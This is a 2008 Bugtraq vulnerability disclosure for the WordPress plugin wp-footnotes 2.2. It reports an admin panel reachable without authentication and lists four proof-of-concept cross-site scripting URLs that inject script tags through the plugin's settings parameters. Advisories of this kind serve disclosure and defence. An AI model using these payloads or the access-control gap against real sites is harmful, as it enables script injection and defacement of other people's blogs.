Bugtraq mailing list archives

Wordpress Pluging wp-footnotes 2.2 (admin_panel.php) Multiple Vulnerabilites


From: nbbn () gmx net
Date: Fri, 1 Feb 2008 19:59:18 +0100

################################################################
Wordpress Plugin wp-footnotes 2.2  admin_panel.php Multiple Vulnerabilities
Founded: 1st, February 2008 Founder: NBBN
################################################################

1) No Access Control.

An attacker can access the adminpanel of the footnotes. 

http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php

The result -> Many XSS Vulnerabilities. because no defines of variables. And 
he can add his own code on the blog footer.


2) Multiple XSS Vuln's  (Register Globals: ON)

http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_footnotes_current_settings[priority]=";><script>alert("XSS")</script>

http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_footnotes_current_settings[style_rules]=</textarea><script>alert("XSS")</script>

http://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current_settings[pre_footnotes]=</textarea><script>alert("XSS")</script>

http://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current_settings[post_footnotes]=</textarea><script>alert(":-(")


Current thread: